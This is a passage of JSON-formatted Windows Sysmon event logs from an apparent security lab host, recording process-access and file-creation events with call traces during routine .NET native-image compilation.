indows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7938,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7939,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.684\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00106BD20C00}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.684","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00106BD20C00}","TargetProcessId":"4556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7940,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.684\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00106BD20C00}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.684","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00106BD20C00}","TargetProcessId":"4556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7941,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.684\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-00106BD20C00}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.684","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-00106BD20C00}","TargetProcessId":"4556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7942,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:01:18.794\r\nProcessGuid: {E2A3D6B1-133E-5F25-0000-00100F390D00}\r\nProcessId: 4556\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11cc-0\\Microsoft.Workflow.Compiler.exe\r\nCreationUtcTime: 2020-08-01 07:01:18.794","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:01:18.794","ProcessGuid":"{E2A3D6B1-133E-5F25-0000-00100F390D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11cc-0\\Microsoft.Workflow.Compiler.exe","CreationUtcTime":"2020-08-01 07:01:18.794","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7943,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.825\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010E6D60C00}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.825","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010E6D60C00}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7944,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.825\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010E6D60C00}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.825","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010E6D60C00}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7945,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.825\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010E6D60C00}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.825","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010E6D60C00}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7946,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.872\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105C410D00}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 